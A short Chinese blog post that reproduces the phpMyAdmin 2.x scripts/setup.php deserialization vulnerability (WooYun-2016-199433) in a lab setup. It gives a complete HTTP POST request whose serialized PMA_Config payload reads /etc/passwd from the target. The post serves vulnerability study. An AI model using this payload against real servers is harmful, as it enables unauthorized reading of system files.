joker0xxx3's Blog

现实告诉我：保持好奇心，享受孤独

phpmyadmin Scripts/setup.php 反序列化漏洞 (WooYun-2016-199433)

发表于 2021-12-13 | 分类于漏洞复现 |

phpmyadmin Scripts/setup.php 反序列化漏洞 (WooYun-2016-199433)

受影响的版本：2.x

漏洞复现

访问http://192.168.44.132:8080，您将看到 phpmyadmin 主页。因为没有连接到数据库，我们会得到一个错误。但是这个漏洞与数据库无关，所以直接忽略。

发送以下包可读取/etc/passwd：

POST /scripts/setup.php HTTP/1.1
Host: 192.168.44.132:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

本文作者： joker0xxx3
本文链接： http://joker-vip.github.io/2021/12/13/phpmyadmin%20Scripts-setup.php%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%20(WooYun-2016-199433)/
版权声明： 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 3.0 许可协议。转载请注明出处！

0%